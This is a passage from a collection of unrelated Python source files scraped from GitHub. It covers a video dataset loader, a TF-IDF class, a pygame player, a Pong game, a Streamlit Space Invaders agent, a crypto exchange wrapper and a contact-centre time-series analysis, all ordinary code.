imz in images]).max(axis=0)\n blob = np.zeros((len(images), max_shape[0], max_shape[1], 3),\n dtype=np.float32)\n for i in range(len(images)):\n blob[i,0:images[i].shape[0], 0:images[i].shape[1], :] = images[i]\n\n process_data = self.transform(blob)\n return process_data\n\n def get_adj_frames(self,record,segment_indices):\n new_adj_indices =[]\n average_duration = (record.num_frames) // self.num_segments\n #if average_duration < 3:\n #if record.num_frames > 80:\n for seg in segment_indices:\n new_adj_indices.append(np.abs(seg-2))\n new_adj_indices.append(np.abs(seg-1))\n new_indices = [1 if i == 0 else i for i in new_adj_indices]\n #else:\n ''''for ind in range(len(segment_indices)):\n if ind == 0:\n new_adj_indices.extend(random.sample(list(range(segment_indices[ind])),2))\n continue\n new_adj_indices.extend(random.sample(list(range(segment_indices[ind-1]+1,segment_indices[ind])),2))\n new_indices = [1 if i == 0 else i for i in new_adj_indices]'''\n\n return new_indices\n\n \n def __len__(self):\n return (len(self.video_list))\n\n def clip_boxes(boxes, im_shape):\n \"\"\"\n Clip boxes to image boundaries.\n \"\"\"\n \n boxes[boxes < 0] = 0\n batch_x = im_shape[:, 1] - 1\n batch_y = im_shape[:, 0] - 1\n\n boxes[:,:,0][boxes[:,:,0] > batch_x] = batch_x\n boxes[:,:,1][boxes[:,:,1] > batch_y] = batch_y\n boxes[:,:,2][boxes[:,:,2] > batch_x] = batch_x\n boxes[:,:,3][boxes[:,:,3] > batch_y] = batch_y\n\n return boxes","repo_name":"TeCSAR-UNCC/S-RAD-ActionLocalizationClassification","sub_path":"S-RAD/dataset_config/UCF_Sports/ucfsports.py","file_name":"ucfsports.py","file_ext":"py","file_size_in_byte":15627,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"10673344732","text":"import math\nimport os\nfrom collections import defaultdict\nfrom textblob import TextBlob\nfrom projects import ROOT\nfrom pandas import DataFrame\n\n\nclass TfIdfException(Exception):\n pass\n\n\nclass TfIdf:\n \"\"\"\n short for term frequency–inverse document frequency,\n is a numerical statistic that is intended to reflect how important a word is\n to a document in a collection or corpus.\n \"\"\"\n\n def __init__(self):\n self.weighted = False\n self.tf = {}\n self.term_counter = defaultdict(int)\n self.idf = defaultdict(int)\n\n def get_doc_names(self):\n return self.tf.keys()\n\n def calculate(self, doc_name):\n \"\"\"\n calculate the tf-idf of a document\n :param list_of_words:\n :return:\n \"\"\"\n doc_tf = self.tf.get(doc_name)\n if doc_tf is not None:\n self.calc_idf()\n tf_idf = defaultdict(list)\n for word in doc_tf.keys():\n word_idf = self.idf.get(word)\n word_tf = doc_tf[word]\n tf_idf['word'].append(word)\n tf_idf['tf_idf'].append(word_tf * word_idf)\n return tf_idf\n raise TfIdfException('unknown document number. use the method \"add_document_to_the_corpus\"')\n\n def calc_idf(self):\n total_documents = len(self.tf)\n for term in self.term_counter:\n for doc, word_frequency in self.tf.items():\n if term in word_frequency:\n self.idf[term] += 1\n self.idf.update((x, math.log(total_documents / y)) for x, y in self.idf.items())\n return self.idf\n\n def add_document_to_the_corpus(self, doc_name, text):\n \"\"\"\n :param doc_name: the name of a document / paragraph. we use the number.\n :param text: a list of the words in the document / paragraph\n :return:\n \"\"\"\n words = TextBlob(text).words\n # building a dictionary\n doc_dict = defaultdict(int)\n for word in words:\n doc_dict[word] += 1\n self.term_counter[word] += 1\n # normalizing the dictionary\n length = float(len(words))\n for k in doc_dict:\n doc_dict[k] = doc_dict[k] / length\n\n # add the normalized document to the corpus\n self.tf[doc_name] = doc_dict\n\n\nif __name__ == '__main__':\n # read the file\n corpus_path = os.path.join(ROOT, 'tf-idf', 'alice_munro_voices.txt')\n with open(corpus_path, 'r') as corpus_file:\n corpus = corpus_file.read()\n documents = corpus.splitlines()\n\n # add paragraph per paragraph\n tfidf = TfIdf()\n for i, document in enumerate(documents):\n tfidf.add_document_to_the_corpus(i, document)\n\n tfidf_doc = tfidf.calculate(doc_name=0)\n\n # create a dataframe\n df = DataFrame(tfidf_doc)\n top_words = df.sort_values('tf_idf')[-10:]\n # print the words with the most info\n print('the words with the most information of the first paragraph are: \\n {}'.format(top_words))\n","repo_name":"vincentclaes/datascience","sub_path":"projects/tf-idf/tf-idf.py","file_name":"tf-idf.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73849479411","text":"\nfrom scripts.terrain import BLOCK_SIZE\nfrom scripts.setting import *\nfrom scripts.sprtiesheet import Spritesheet\nfrom scripts.layer import *\n\nPLAYER_SIZE = 96\nPLAYER_WIDTH = 65\nPLAYER_VEL = 4\nDELAY_MOVE = 3\nJUMP = 20\n\nclass Player:\n\n def __init__(self):\n self.stand_right = Spritesheet('media/player_1_standby_right.png').load_spritesheet(PLAYER_SIZE, PLAYER_SIZE)\n self.stand_left = Spritesheet('media/player_1_standby_left.png').load_spritesheet(PLAYER_SIZE, PLAYER_SIZE)\n self.walk_right = Spritesheet('media/player_1_run_right.png').load_spritesheet(PLAYER_SIZE, PLAYER_SIZE)\n self.walk_left = Spritesheet('media/player_1_run_left.png').load_spritesheet(PLAYER_SIZE, PLAYER_SIZE)\n self.jump_right = Spritesheet('media/player_1_jump_right.png').load_spritesheet(PLAYER_SIZE, PLAYER_SIZE)\n self.jump_left = Spritesheet('media/player_1_jump_left.png').load_spritesheet(PLAYER_SIZE, PLAYER_SIZE)\n self.fall_right = Spritesheet('media/player_1_fall_right.png').load_spritesheet(PLAYER_SIZE, PLAYER_SIZE)\n self.fall_left = Spritesheet('media/player_1_fall_left.png').load_spritesheet(PLAYER_SIZE, PLAYER_SIZE)\n\n x = 100\n y = 500\n self.sprite = self.stand_right\n self.rect = pygame.Rect(x, y, PLAYER_WIDTH, PLAYER_SIZE)\n self.hitbox_offset_x = (PLAYER_SIZE - PLAYER_WIDTH)//2\n self.maxhealth = 10.0 #set in decimal\n self.health = self.maxhealth\n\n self.dir = 1\n\n self.move_x = 0\n self.moving = False\n self.jumping = 0\n self.gravity = 0\n\n def update(self):\n\n if self.moving:\n if self.move_x > 0:\n self.move_x -= 1\n self.rect.x += PLAYER_VEL\n elif self.move_x < 0:\n self.move_x += 1\n self.rect.x -= PLAYER_VEL\n elif self.move_x == 0:\n self.moving = False\n else:\n if self.dir == -1:\n self.sprite = self.stand_left\n elif self.dir == 1:\n self.sprite = self.stand_right\n \n\n \n if self.jumping > 0:\n self.jumping -= 1\n for i in range(self.jumping):\n self.rect.y -= 1\n if self.dir == -1:\n self.sprite = self.jump_left\n elif self.dir == 1:\n self.sprite = self.jump_right \n\n \n def move_left(self):\n self.move_x = -DELAY_MOVE\n self.moving = True\n if self.jumping == 0:\n self.sprite = self.walk_left \n \n\n def move_right(self): \n self.move_x = DELAY_MOVE\n self.moving = True\n if self.jumping == 0:\n self.sprite = self.walk_right \n \n def fall(self):\n if self.jumping == 0:\n if self.gravity == 0:\n self.gravity = 1\n else:\n if self.gravity <= 7:\n self.gravity += 1\n for i in range(self.gravity):\n self.rect.y += 1\n\n if self.dir == -1:\n self.sprite = self.fall_left\n elif self.dir == 1:\n self.sprite = self.fall_right\n \n\n \n def hit_ground(self):\n self.gravity = 0\n self.rect.bottom = ((ceil((self.rect.bottom + 5)/BLOCK_SIZE) - 1) * BLOCK_SIZE) + 1\n \n def jump(self):\n if self.jumping == 0:\n self.jumping = JUMP \n\n def is_jumping(self):\n return self.jumping > 0\n\n def reset_jump(self):\n self.jumping = 0\n \n def climb_up(self):\n self.rect.y -= 4\n \n def climb_down(self):\n self.rect.y += 4\n \n def draw(self, off_set):\n frame = pygame.time.get_ticks() // 180 % len(self.sprite)\n \n screen.blit(self.sprite[frame], (self.rect.x - self.hitbox_offset_x + off_set[0], self.rect.y + off_set[1]))\n pygame.draw.rect(screen, (255, 255, 255), (self.rect.x + off_set[0], self.rect.y + off_set[1], self.rect.width, self.rect.height), 2)\n","repo_name":"Jiruu246/Platform_Game","sub_path":"scripts/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35362648851","text":"'''\nfor index1 in range(1, 10):\n for index2 in range(1, 10):\n for index3 in range(1, 10):\n for index4 in range(1, 10):\n for index5 in range(1, 10):\n for index6 in range(1, 10):\n for index7 in range(1, 10):\n for index8 in range(1, 10):\n number_sum_ascii = ord(str(index1))+ord(str(index2))+ord(str(index3))+ord(str(index4))+ord(str(index5))+ord(str(index6))+ord(str(index7))+ord(str(index8))\n the_pass = str(index1)+str(index2)+str(index3)+str(index4)+str(index5)+str(index6)+str(index7)+str(index8)\n if number_sum_ascii%11 == 5:\n print(the_pass, number_sum_ascii,number_sum_ascii%11)\n'''\n\n'''\nlist_mod = \"104,122,104,97,53,53,54,49,50,51,52,53,54,55\".split(\",\")\nresult_list = []\nsum_result = 0\nfor index in range(len(list_mod)):\n list_mod[index] = int(list_mod[index])\nfor index in range(len(list_mod)):\n sum_result += list_mod[index]\nprint(sum_result)\n'''\n\n\n'''\nsame_hash_list = []\nfor index in range(65, 91):\n if index % 11 == 5:\n same_hash_list.append(chr(index))\nprint(same_hash_list)\n'''\n\n\nm = 396\nfor d in range(0, m+1):\n if (283*d)%m == 1:\n print(d)\n","repo_name":"haiqiang-zhang/SoftwareTool_in_UoA","sub_path":"COMPSCI110/ASCII_mod_hash.py","file_name":"ASCII_mod_hash.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6828083974","text":"from flask_restplus.fields import Integer, Float, String, String as Text, Date, DateTime, Boolean\n\ndef create_model(api):\n model = api.model('rulepackageObjectRel', {\n 'idRulepackageobjectrel': Integer,\n 'idRulepackage': Integer,\n 'idObject': Integer,\n 'errored': Boolean,\n 'synced': Boolean,\n 'syncedAt': DateTime \n },mask='*');\n return model","repo_name":"tunghoang/ips-manager","sub_path":"apis/rulepackageObjectRels/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19921021273","text":"import requests\r\n\r\n\r\nclass ExchangeAPI:\r\n def __init__(self, api_key, secret_key):\r\n self.api_key = api_key\r\n self.secret_key = secret_key\r\n\r\n def get_price(self, symbol):\r\n url = f\"https://api.example.com/price?symbol={symbol}\"\r\n headers = {\"X-MBX-APIKEY\": self.api_key}\r\n response = requests.get(url, headers=headers)\r\n response.raise_for_status()\r\n data = response.json()\r\n return float(data[\"price\"])\r\n\r\n\r\n\r\nimport ccxt\r\n\r\n\r\nclass Exchange:\r\n def __init__(self, exchange_id, api_key, secret_key):\r\n self.exchange_id = exchange_id\r\n self.api_key = api_key\r\n self.secret_key = secret_key\r\n self.exchange = self.get_exchange()\r\n\r\n def get_exchange(self):\r\n exchange_class = getattr(ccxt, self.exchange_id)\r\n exchange = exchange_class({\r\n 'apiKey': self.api_key,\r\n 'secret': self.secret_key,\r\n })\r\n return exchange\r\n\r\n def get_balance(self, symbol):\r\n balance = self.exchange.fetch_balance()[symbol]\r\n return balance\r\n\r\n def create_order(self, symbol, order_type, side, amount, price=None):\r\n order = None\r\n try:\r\n if order_type == 'market':\r\n order = self.exchange.create_order(symbol=symbol, type=order_type, side=side, amount=amount)\r\n elif order_type == 'limit':\r\n order = self.exchange.create_order(symbol=symbol, type=order_type, side=side, amount=amount, price=price)\r\n except Exception as e:\r\n print(f'Error creating order: {e}')\r\n return order\r\n\r\n def cancel_order(self, order_id):\r\n result = None\r\n try:\r\n result = self.exchange.cancel_order(order_id)\r\n except Exception as e:\r\n print(f'Error cancelling order: {e}')\r\n return result\r\n\r\n def get_order(self, order_id):\r\n order = None\r\n try:\r\n order = self.exchange.fetch_order(order_id)\r\n except Exception as e:\r\n print(f'Error getting order: {e}')\r\n return order\r\n\r\n def get_open_orders(self, symbol=None):\r\n orders = []\r\n try:\r\n orders = self.exchange.fetch_open_orders(symbol=symbol)\r\n except Exception as e:\r\n print(f'Error getting open orders: {e}')\r\n return orders\r\n","repo_name":"play2323/tradingbots","sub_path":"trading_bot/exchange_api/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20923764501","text":"import streamlit as st\n# import tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\n\nimport gym\nfrom gym.wrappers.atari_preprocessing import AtariPreprocessing\nfrom gym.wrappers.frame_stack import FrameStack\n\n\nLOCAL_MODEL = r'../modelling/saved-models/Student_Teacher_BestModel-ep500.h5'\n\n### Helper functions\n\ndef instantiate_environmnent():\n env = gym.make(\"SpaceInvadersNoFrameskip-v4\")\n env = AtariPreprocessing(env, grayscale_newaxis=True, frame_skip=5)\n env = FrameStack(env, 4)\n\n return env\n\ndef load_model(model_h5=LOCAL_MODEL):\n model = keras.models.load_model(model_h5)\n return model\n\n### End Helper Funtions\n\n# Instantiate\n\nenv = instantiate_environmnent()\nmodel = load_model()\n\nst.set_page_config(layout='wide')\n\n\n### Sidebar\n\n# st.sidebar.title('BIGCHAMP-900')\n\n# st.sidebar.markdown(\"\"\"## Time to save the world!\"\"\")\n# episodes = st.sidebar.expander('N games').slider('', 1, 10, 5)\n# start_model = st.sidebar.button(\"BLAST OFF!\")\n# stop_model = st.sidebar.button(\"Stand down Champ!\")\n\nst.sidebar.markdown('''\n Team:\n - Alex Gribius\n - Dan Hawkins\n - Alberto Lopez Rueda\n - Lorcan Rae\n\n With thanks to Oliver Giles\n ''')\n\n\n### Main\n\ncol1, col2 = st.columns([1, 1])\n\nwith col2:\n st.title('BIGCHAMP-900')\n st.markdown(\"\"\"## Time to save the world!\"\"\")\n episodes = st.slider('N Games', 1, 10, 5)\n start_model = st.button(\"BLAST OFF!\")\n stop_model = st.button(\"Stand down Champ!\")\n\nDISPLAY_WIDTH = 420\n\nwith col1:\n\n if start_model:\n\n with st.empty():\n\n for episode in range(1, episodes+1):\n state = np.asarray(env.reset()).reshape(84, 84, 4)\n done = False\n score = 0\n\n while not done:\n batch_state = np.expand_dims(state, 0)\n action = np.argmax(model.predict(batch_state)[0])\n state, reward, done, info = env.step(action)\n state = np.asarray(state).reshape(84, 84, 4)\n score += reward\n st.image(env.render(mode='rgb_array'), width=DISPLAY_WIDTH)\n\n if stop_model:\n break\n\n else:\n with st.empty():\n state = np.asarray(env.reset()).reshape(84, 84, 4)\n st.image(env.render(mode='rgb_array'), width=DISPLAY_WIDTH)\n","repo_name":"AlexanderGribius/space-invaders","sub_path":"website/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"580435056","text":"import turtle\n\nsc = turtle.Screen()\nsc.setup(width = 1000 , height = 800)\nsc.bgcolor(\"black\")\nsc.title(\"Pong\")\n\n#MENU :\n\nmenu = turtle.Turtle()\nmenu.speed(0)\nmenu.penup()\nmenu.ht()\nmenu.setx(-95)\nmenu.sety(250)\nmenu.pendown()\nmenu.color(\"green\")\nmenu.write(\"Pong NSI\", move=False, align='left', font=('Spectral', 50, 'normal'))\n\nmenu.penup()\nmenu.setx(-205)\nmenu.sety(0)\nmenu.pendown()\nmenu.color(\"green\")\nmenu.write(\"Presser SPACE pour commencer\", move=False, align='left', font=('Spectral', 30, 'normal'))\nmenu.penup()\nmenu.setx(-300)\nmenu.sety(- 40)\nmenu.pendown()\nmenu.color(\"green\")\nmenu.write(\"Presser SPACE de nouveau pour recommencer\", move=False, align='left', font=('Arial', 30, 'normal'))\n\n#SCORE :\n\ns1 = turtle.Turtle()\ns1.speed(0)\ns1.penup()\ns1.ht()\ns1.setx(-250)\ns1.sety(200)\ns1.pendown()\ns1.color(\"green\")\n\ns2 = turtle.Turtle()\ns2.speed(0)\ns2.penup()\ns2.ht()\ns2.setx(250)\ns2.sety(200)\ns2.pendown()\ns2.color(\"green\")\n\n#GAME OVER:\n\nover = turtle.Turtle()\nover.speed(0)\nover.penup()\nover.ht()\nover.setx(-100)\nover.sety(0)\nover.pendown()\nover.setx(-180)\nover.sety(0)\nover.pendown()\nover.color(\"red\")\n\n#COMMENCER JEU :\n\ndef gamestart():\n menu.clear()\n main()\n \n#RESTART :\n \ndef restart():\n sc.clear()\n sc.setup(width = 1000 , height = 800)\n sc.bgcolor(\"black\")\n sc.title(\"Pong\")\n main()\n \n \n#GAME :\n\ndef main():\n global over\n global s1\n global s2\n \n #LIMITE :\n limite = turtle.Turtle()\n limite.penup()\n limite.color(\"green\")\n limite.width(5)\n limite.speed(0)\n limite.ht()\n limite.goto(-470, -370)\n limite.pd()\n limite.goto(470, -370)\n limite.goto(470, 370)\n limite.goto(-470, 370)\n limite.goto(-470, -370)\n limite.speed(0)\n \n #BALLE:\n \n balle = turtle.Turtle()\n balle.shape(\"circle\")\n balle.color(\"green\")\n balle.penup()\n balle.goto(0,0)\n balle.speed()\n \n #MOUVEMENT :\n \n move_x = 1\n move_y = 1 \n \n #RAQUETTE 1 :\n \n r1 = turtle.Turtle()\n r1.speed(0)\n r1.shape(\"square\")\n r1.speed(0)\n r1.setheading(90)\n r1.shapesize(1,5)\n r1.penup()\n r1.goto(-450, 0)\n r1.color(\"green\")\n\n #RAQUETTE 2 :\n \n r2 = turtle.Turtle()\n r2.shape(\"square\")\n r2.speed(0)\n r2.setheading(90)\n r2.shapesize(1,5)\n r2.penup()\n r2.goto(450, 0)\n r2.color(\"green\")\n\n\n #SCORE :\n\n score_r1 = 0 \n score_r2 = 0 \n \n s1.write(score_r1, move=False, align='left', font=('Spectral', 50, 'normal'))\n s2.write(score_r2, move=False, align='left', font=('Spectral', 50, 'normal'))\n\n #MOUVEMENT BALLE:\n def r1_up():\n r1.penup()\n r1.fd(25)\n \n def r2_up():\n r2.penup()\n r2.fd(25)\n\n def r1_down():\n r1.penup()\n r1.bk(25)\n \n def r2_down():\n r2.penup()\n r2.bk(25) \n \n sc.listen()\n sc.onkeypress(r1_up, \"w\")\n sc.onkeypress(r2_up, \"Up\")\n sc.onkeypress(r1_down, \"s\")\n sc.onkeypress(r2_down, \"Down\")\n \n #UPDATE :\n\n while True:\n sc.update()\n sc.tracer(0)\n \n x = balle.xcor() + move_x\n y = balle.ycor() + move_y\n balle.setx(x)\n balle.sety(y)\n\n \n #COLLISION:\n \n #DROITE ET GAUCHE :\n if balle.xcor() > 450:\n balle.goto(0,0) #restart\n balle.speed(0)\n score_r1 += 1\n s1.clear()\n s1.write(score_r1, move=False, align='left', font=('Arial', 50, 'normal'))\n \n if balle.xcor() < -450:\n balle.goto(0,0) #restart\n balle.speed(0)\n score_r2 += 1\n s2.clear()\n s2.write(score_r2, move=False, align='left', font=('Arial', 50, 'normal'))\n \n # TOP :\n if balle.ycor() > 360 :\n balle.sety(360)\n move_y = move_y * -1\n \n #BOTTOM :\n if balle.ycor() < -360 :\n balle.sety(-360)\n move_y = move_y * -1\n \n #RAQUETTES : \n \n if r1.ycor() + 50 > 360:\n r1.sety(330)\n r1_down()\n \n if r2.ycor() + 50 > 360:\n r2.sety(330)\n r2_down()\n \n if r1.ycor() - 50 < -360:\n r1.sety(-330)\n r1_up()\n \n if r2.ycor() - 50 < -360:\n r2.sety(-330)\n r2_up()\n \n if balle.ycor() < r2.ycor() + 60 and balle.ycor() > r2.ycor() - 60 and balle.xcor() > 440 and balle.xcor() < 450:\n balle.setx(440)\n move_x = move_x * -1\n \n if balle.ycor() < r1.ycor() + 60 and balle.ycor() > r1.ycor() - 60 and balle.xcor() <- 440 and balle.xcor() > -450:\n balle.setx(-440)\n move_x = move_x * -1 \n \n #RESULTAT : \n \n if score_r1 == 10 :\n over.write(\"Player 1 Won !!!\", move=False, align='left', font=('Spectral', 50, 'normal'))\n break\n \n if score_r2 == 10 :\n over.write(\"Player 2 Won !!!\", move=False, align='left', font=('Spectral', 50, 'normal'))\n break\n \n sc.listen()\n sc.onkeypress(restart, \"space\")\n \n\nsc.listen()\nsc.onkeypress(gamestart, \"space\")","repo_name":"jdolivet/NSI-Projets","sub_path":"Premiere/2022/Projet-2/Pong/pong_final.py","file_name":"pong_final.py","file_ext":"py","file_size_in_byte":5242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20061958441","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pylab as plt\nfrom matplotlib.pylab import rcParams\nrcParams['figure.figsize'] = 10,6\nimport datetime as dt\nfrom statsmodels.tsa.stattools import adfuller\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nfrom statsmodels.tsa.filters.hp_filter import hpfilter\nfrom statsmodels.tsa.stattools import acf, pacf\n\n#First import to check the data was imported correctly; cleaned in R so shouldn't be a problem\npath = \"E:/BigDataAnalytics/eChat/Analysis/\"\nfile_ts_data = \"contactsbytype.csv\"\nfile_stats_2015 = \"contacts&statsbytype2015.csv\"\n\ndef read_data(path,filename):\n data = pd.read_csv(path+filename)\n return data\n \ndata1 = read_data(path,file_ts_data)\ndata2 = read_data(path, file_stats_2015)\n\n#data1.head()\n#data2.head()\n\n#Import the data and overwrite the pandas dataframe currently storing the time series data with date parser \n#object converted to datetime \ndateparse = lambda dates: dt.datetime.strptime(dates, '%d-%b-%y')\ndata = pd.read_csv(path+file_stats_2015, parse_dates=['DATE_OF_CALL'], index_col = 'DATE_OF_CALL', date_parser=dateparse)\nprint(data.head())\nprint(data.columns.values,sep='\\n', end='\\n')\n\n#Set the timeseries data\n#count\nts_outboundcall = data['COUNT_OF_CONTACTS.Outbound Call']\nts_outboundcall = ts_outboundcall.sort_index()\n#Effort\n\nts_offline = data['COUNT_OF_CONTACTS.Offline']\nts_offline = ts_offline.sort_index()\n\nts_chat = data['COUNT_OF_CONTACTS.Chat']\nts_chat = ts_chat.sort_index()\n\nts_email = data['COUNT_OF_CONTACTS.Inbound Email']\nts_email = ts_email.sort_index()\n\nts_voice = data['COUNT_OF_CONTACTS.Inbound Call']\nts_voice = ts_voice.sort_index()\n\nts_voice_xfer = data['COUNT_OF_CONTACTS.Inbound Call XFER']\nts_voice_xfer = ts_voice_xfer.sort_index()\n\nts_letter = data['COUNT_OF_CONTACTS.Letter - Inbound']\nts_letter = ts_letter.sort_index()\n\n\n#Initial plot of the two time series for chat and inbound voice answered\nfig1 = plt.figure()\nplt.plot(ts_voice_xfer)\nplt.plot(ts_voice)\nplt.plot(ts_outboundcall)\nplt.legend(loc='best')\n\nfig_digi = plt.figure()\nplt.plot(ts_chat)\nplt.plot(ts_offline)\nplt.plot(ts_email)\nplt.plot(ts_letter)\nplt.legend(loc='best')\n\ndef test_stationarity(timeseries, title=\"\"):\n #determing the rolling statistics\n rollmean = timeseries.rolling(center=False, window = 7).mean()\n rolstd = timeseries.rolling(center=False, window = 7).std()\n\n #Plot rolling stats\n fig = plt.figure()\n #orig = plt.plot(timeseries, color='blue', label = 'Orginal')\n mean = plt.plot(rollmean, color = 'red', label = \"Rolling Mean\")\n std = plt.plot(rolstd, color = 'black', label = 'Rolling Std')\n plt.legend(loc='best')\n plt.title(title+' Rolling Mean & Standard Deviation')\n \n #Perform Dickey-Fuller Test:\n print('Results from Dickey Fuller test: '+title)\n dftest = adfuller(timeseries, autolag = 'AIC')\n dfoutput = pd.Series(dftest[0:4], \n index=['Test Statistic', \n 'p-value', \n '#Lags Used', \n 'Number of Observations Used'])\n for k,v in dftest[4].items():\n dfoutput['Critical Value (%s)'%k] = v \n print(dfoutput)\n\ndef test_stationarity_AUG(timeseries1, timeseries2, title:list):\n #determing the rolling statistics\n win = 30\n rollmean1 = timeseries1.rolling(center=False, window = win).mean()\n #rolstd1 = timeseries1.rolling(center=False, window = 30).std()\n rollmean2 = timeseries2.rolling(center=False, window = win).mean()\n #rollstd2 = timeseries2.rolling(center =False, window =30).std()\n #Plot rolling stats\n fig = plt.figure()\n #orig = plt.plot(timeseries, color='blue', label = 'Orginal')\n mean1 = plt.plot(rollmean1, color = 'darkviolet', linewidth = 2, label = \"%s day Rolling Mean %s\"%(win,title[0]))\n mean2 = plt.plot(rollmean2, color = 'slateblue', linewidth = 2,label = \"%s day Rolling Mean %s\"%(win,title[1]))\n #std1 = plt.plot(rolstd1, color = 'black', label = 'Rolling Std')\n plt.legend(loc='best')\n plt.title('Total Contacts for %s and %s Rolling Mean'%(title[0],title[1]))\n plt.savefig('%s_%s_Rolling_Mean'%(title[0],title[1]))\n\ntest_stationarity_AUG(ts_chat.dropna(), ts_voice.dropna(), ['Chat', 'Voice'])\nls = [ts_chat.dropna(), ts_voice.dropna(), ts_voice_xfer.dropna(), ts_outboundcall.dropna(), ts_offline.dropna()]\nls_names = ['Chat', 'Inbound Voice', 'Inbound Voice XFER', 'Oubound Voice', 'Offline']\n\ndef process_ts(ls: list, names: list):\n count = 0\n for i in ls:\n test_stationarity(i, names[count])\n count = count+ 1\n\nprocess_ts(ls, ls_names)\n\n#decomposition\ndef decomp_ts(timeseries, name:str, freq:int):\n\n decomposition = seasonal_decompose(timeseries, freq=freq)\n trend = decomposition.trend\n seasonal = decomposition.seasonal\n residual = decomposition.resid\n fig = plt.figure()\n plt.subplot(411)\n plt.plot(timeseries, label=name+' Original')\n plt.legend(loc='best')\n plt.subplot(412)\n plt.plot(trend, label=name+' Trend')\n plt.legend(loc='best')\n plt.subplot(413)\n plt.plot(seasonal,label=name+' Seasonality')\n plt.legend(loc='best')\n plt.subplot(414)\n plt.plot(residual, label=name+' Residuals')\n plt.legend(loc='best')\n plt.tight_layout()\n return trend, seasonal, residual, decomposition\n\nt,s,r,d = decomp_ts(ts_chat.dropna(), 'Chat', 90)\ntest_stationarity(residual.dropna())\n\nlag_acf = acf(residual.dropna(), nlags=20)\nlag_pacf = pacf(residual.dropna(), nlags=20, method='ols')\n\nplt.subplot(121) \nplt.plot(lag_acf)\nplt.axhline(y=0,linestyle='--',color='gray')\nplt.axhline(y=-1.96/np.sqrt(len(residual.dropna())),linestyle='--',color='gray')\nplt.axhline(y=1.96/np.sqrt(len(residual.dropna())),linestyle='--',color='gray')\nplt.title('Autocorrelation Function')\n\nplt.subplot(122)\nplt.plot(lag_pacf)\nplt.axhline(y=0,linestyle='--',color='gray')\nplt.axhline(y=-1.96/np.sqrt(len(residual.dropna())),linestyle='--',color='gray')\nplt.axhline(y=1.96/np.sqrt(len(residual.dropna())),linestyle='--',color='gray')\nplt.title('Partial Autocorrelation Function')\nplt.tight_layout()\n\n#hpfilter\ncycle, trend = hpfilter(ts_chat.dropna(), 6.25)\nfig = plt.figure()\nplt.plot(cycle)\nplt.plot(trend)\nplt.plot(ts_chat.dropna())\n\ncycle, trend = hpfilter(ts_voice.dropna(), 6.25)\nfig = plt.figure()\nplt.plot(cycle)\nplt.plot(trend)\nplt.plot(ts_voice.dropna())\n\n#########################################################################\n## substitution data breakdown for bar chart\n#########################################################################\n\nf_sub = \"substitution_data_final.csv\"\nsub_data = pd.read_csv(path+f_sub, parse_dates=['DATE_OF_CALL'], \n index_col = 'DATE_OF_CALL', date_parser=dateparse)\n\ngenerated = sub_data['generated'] - sub_data['COUNT_OF_CONTACTS']\n\nsub_data['gen_final'] = generated \npercentage = (sub_data['COUNT_OF_CONTACTS.Chat'] - \n sub_data['gen_final'])/sub_data['COUNT_OF_CONTACTS.Chat']*100\nsub_data['subs_percent'] = percentage\nsub_data = sub_data[sub_data.index.year < 2017]\n\nM_sub_avgs = sub_data.groupby(by =[sub_data.index.month, sub_data.index.year]).mean()\n\nM_sub_sdevs = sub_data.groupby(by = [sub_data.index.month, sub_data.index.year]).std()\n\nmths = np.arange(12)\nmths_names = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']\n\nfig,ax1 = plt.subplots()\n\np1 = ax1.bar(mths, M_sub_avgs['COUNT_OF_CONTACTS.x'], \n width = 0.5, yerr=M_sub_sdevs['COUNT_OF_CONTACTS.x'],\n color='darkslateblue',\n label = 'Direct Subsitutions')\np2 = ax1.bar(mths, M_sub_avgs['COUNT_OF_CONTACTS.y'], \n width = 0.5, bottom = M_sub_avgs['COUNT_OF_CONTACTS.x'],\n yerr=M_sub_sdevs['COUNT_OF_CONTACTS.y'],\n color='blueviolet',\n label = 'New BB')\np3 = ax1.bar(mths, M_sub_avgs['COUNT_OF_CONTACTS'], \n width = 0.5, yerr=M_sub_sdevs['COUNT_OF_CONTACTS'],\n bottom=[i+j for i,j in zip(M_sub_avgs['COUNT_OF_CONTACTS.x'],M_sub_avgs['COUNT_OF_CONTACTS.y'])],\n color = 'mediumorchid',\n label = 'Tenured Customers with no complaint history')\np4 = ax1.bar(mths, M_sub_avgs['gen_final'], \n width = 0.5, yerr=M_sub_sdevs['gen_final'],\n bottom=[i+j+k for i,j,k in zip(M_sub_avgs['COUNT_OF_CONTACTS.x'],\n M_sub_avgs['COUNT_OF_CONTACTS.y'],\n M_sub_avgs['COUNT_OF_CONTACTS'])],label = 'Generated',color = 'indianred')\n\nplt.ylabel('Chat Contacts (count)')\nplt.title('Chat Substitution: Breakdown of subsitution types by month')\nplt.xticks(mths,mths_names)\n\nax2 = ax1.twinx()\np5 = ax2.plot(mths, M_sub_avgs['subs_percent'], '--r', linewidth = 2, label = 'percentage_substituted')\nax2.set_ylim([0,100])\nax1.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),\n ncol=3, fancybox=True, 